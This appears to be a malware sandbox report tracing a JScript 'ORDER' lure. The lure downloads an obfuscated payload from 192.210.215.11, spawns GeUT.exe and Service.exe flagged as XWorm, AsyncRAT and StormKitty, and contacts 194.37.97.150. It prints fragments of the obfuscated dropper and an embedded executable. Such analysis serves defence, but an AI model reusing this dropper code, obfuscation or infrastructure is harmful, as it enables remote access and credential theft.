                          Oct 1, 2024 07:40:06.742455006 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.766573906 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.768227100 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.817137957 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.820034027 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.873174906 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.933770895 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.937262058 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.942018986 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:07.992017984 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:07.996958017 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:08.127213001 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:08.131437063 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:08.137013912 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:17.538971901 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:17.544106960 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:17.601547956 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:17.606683969 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:17.672422886 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:17.677217007 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:17.682105064 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:17.769398928 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:17.773189068 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:17.778479099 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:18.023431063 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:18.028573990 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:18.156773090 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:18.158721924 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:18.163764954 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:23.164165974 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:23.169318914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:23.297476053 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:23.397983074 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:23.535254955 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:23.537647009 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:25.006131887 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:25.011049032 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:25.011504889 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:25.016269922 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:25.226429939 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:25.227114916 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:25.232054949 CEST698049705194.37.97.150192.168.2.8

                          HTTP Request Dependency Graph

                          • 192.210.215.11

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849704192.210.215.11805672C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 07:38:13.429106951 CEST328OUTGET /zoom/cc.js HTTP/1.1
                          Accept: */*
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: 192.210.215.11
                          Connection: Keep-Alive
                          Oct 1, 2024 07:38:13.919840097 CEST1236INHTTP/1.1 200 OK
                          Date: Tue, 01 Oct 2024 05:38:13 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                          Last-Modified: Sun, 29 Sep 2024 18:34:13 GMT
                          ETag: "1a63a4-6234655ba12a5"
                          Accept-Ranges: bytes
                          Content-Length: 1729444
                          Content-Disposition: attachment
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/octet-stream
                          Data Raw: ff fe 2f 00 2f 00 43 00 6f 00 64 00 65 00 64 00 20 00 42 00 79 00 20 00 50 00 6a 00 6f 00 61 00 6f 00 31 00 35 00 37 00 38 00 0d 00 0a 00 0d 00 0a 00 76 00 61 00 72 00 20 00 77 00 64 00 66 00 66 00 42 00 4d 00 64 00 70 00 77 00 75 00 3b 00 0d 00 0a 00 77 00 64 00 66 00 66 00 42 00 4d 00 64 00 70 00 77 00 75 00 20 00 3d 00 20 00 5b 00 22 00 22 00 2c 00 0d 00 0a 00 22 00 57 00 53 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 63 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 72 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 69 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 70 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 74 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 2e 00 53 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 6c 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 [TRUNCATED]
                          Data Ascii: //Coded By Pjoao1578var wdffBMdpwu;wdffBMdpwu = ["","WS!...........!c!!!!"" !"r!...........!i!!!!"" !"p!...........!t!!!!"" !".S!...........!l!!!!"" !"!...........!e!!!!"" !"!...........!e!!!!"" !"p(!...........!0!!!!"" !")!...........!;!!!!"" !"","","WS!...........!c!!!!"" !"r!...........!i!!!!"" !"p!...........!t!!!!"" !".S!...........!l!!!!"" !"!...........!e!!!!"" !"!...........!e!!!!"" !"p(1!...........!0!!!!"" !"!...........!0!!
                          Oct 1, 2024 07:38:13.919861078 CEST224INData Raw: a8 21 91 21 1f 22 22 20 94 21 1f 22 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 30 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 29 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00
                          Data Ascii: !!"" !"!...........!0!!!!"" !")!...........!;!!!!"" !"","","Zr!...........!s!!!!"" !"h!...........!n!!!!"" !"Ikzr
                          Oct 1, 2024 07:38:13.919881105 CEST1236INData Raw: 20 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 3d 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 20 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 27 00 93 21 92 21 a8 21
                          Data Ascii: !...........!=!!!!"" !" !...........!'!!!!"" !"!...........!'!!!!"" !" ","XLSJBr!...........!j!!!!"" !"TTVf!...........!b!
                          Oct 1, 2024 07:38:13.919889927 CEST1236INData Raw: 2e 00 2e 00 21 00 62 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 43 00 4d 00 52 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 73 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 57 00 44 00 45 00 57 00
                          Data Ascii: ..!b!!!!"" !"CMR!...........!s!!!!"" !"WDEWp!...........!j!!!!"" !"!...........!i!!!!"" !"vh!...........!o!!!!"" !"!...........
                          Oct 1, 2024 07:38:13.919905901 CEST1236INData Raw: 50 00 57 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 63 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 55 00 4a 00 58 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 65 00
                          Data Ascii: PW!...........!c!!!!"" !"UJX!...........!e!!!!"" !"!...........!b!!!!"" !"WY!...........!l!!!!"" !"!...........!t!!!!"" !"f!...
                          Oct 1, 2024 07:38:13.919922113 CEST1236INData Raw: 2e 00 21 00 6a 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 44 00 6b 00 51 00 55 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 74 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 59 00 21 00 2e 00 2e 00
                          Data Ascii: .!j!!!!"" !"DkQU!...........!t!!!!"" !"Y!...........!u!!!!"" !"RA!...........!l!!!!"" !"WqE!...........!t!!!!"" !"zZ!..........
                          Oct 1, 2024 07:38:13.919929981 CEST1236INData Raw: 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 6e 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 65 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 21 00 2e 00
                          Data Ascii: .......!n!!!!"" !"!...........!e!!!!"" !"!...........!s!!!!"" !"!...........!c!!!!"" !"!...........!l!!!!"" !"!...........!d!!
                          Oct 1, 2024 07:38:13.919939041 CEST1236INData Raw: 2e 00 2e 00 21 00 6e 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 68 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 6e 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 71 00 72 00 21 00 2e 00 2e 00 2e 00
                          Data Ascii: ..!n!!!!"" !"h!...........!n!!!!"" !"qr!...........!n!!!!"" !"NFCL!...........!w!!!!"" !"!...........!o!!!!"" !"!...........!t
                          Oct 1, 2024 07:38:13.919955015 CEST1236INData Raw: 20 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 3d 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 20 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 27 00 93 21 92 21 a8 21
                          Data Ascii: !...........!=!!!!"" !" !...........!'!!!!"" !"!...........!b!!!!"" !"O!...........!l!!!!"" !"p!...........!s!!!!"" !"L!......
                          Oct 1, 2024 07:38:13.919972897 CEST1236INData Raw: 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 6a 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 56 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 69 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 21 00 2e 00
                          Data Ascii: ......!j!!!!"" !"V!...........!i!!!!"" !"!...........!e!!!!"" !"!...........!c!!!!"" !"U!...........!m!!!!"" !"IP!...........!m
                          Oct 1, 2024 07:38:13.924865961 CEST1236INData Raw: 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 73 00 93 21 92 21 a8 21 91 21 1f 22 22 20 94 21 1f 22 68 00 21 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 2e 00 21 00 6e 00 93 21 92 21 a8 21 91 21 1f 22
                          Data Ascii: ...........!s!!!!"" !"h!...........!n!!!!"" !"Ikzr + !...........!'!!!!"" !"TVqQAAMAAAAEAAAA//!...........!8!!!!"" !"AAL!.....


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:01:38:11
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js"
                          Imagebase:0x7ff75f6e0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:01:38:14
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js"
                          Imagebase:0x7ff75f6e0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:01:38:18
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x800000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:5
                          Start time:01:38:18
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xca0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:7
                          Start time:01:38:29
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x9f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:8
                          Start time:01:38:30
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xf90000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:9
                          Start time:01:38:30
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xa40000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:10
                          Start time:01:38:31
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xa30000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:11
                          Start time:01:38:31
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xcd0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:12
                          Start time:01:38:31
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x6d0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:13
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xae0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:14
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x4f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:15
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x4c0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:16
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x5f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:17
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x260000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:18
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xc30000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:19
                          Start time:01:38:46
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x6e0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:20
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x10000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:21
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x3b0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:22
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x6c0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:23
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x1f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:24
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x910000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:25
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x1a0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:26
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xd0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:27
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x5b0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:28
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x10000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:29
                          Start time:01:38:56
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xdb0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:30
                          Start time:01:38:56
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x400000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:33
                          Start time:01:39:54
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wbem\WMIADAP.exe
                          Wow64 process (32bit):false
                          Commandline:wmiadap.exe /F /T /R
                          Imagebase:0x7ff651f50000
                          File size:182'272 bytes
                          MD5 hash:1BFFABBD200C850E6346820E92B915DC
                          Has elevated privileges:true
                          Has administrator privileges:true
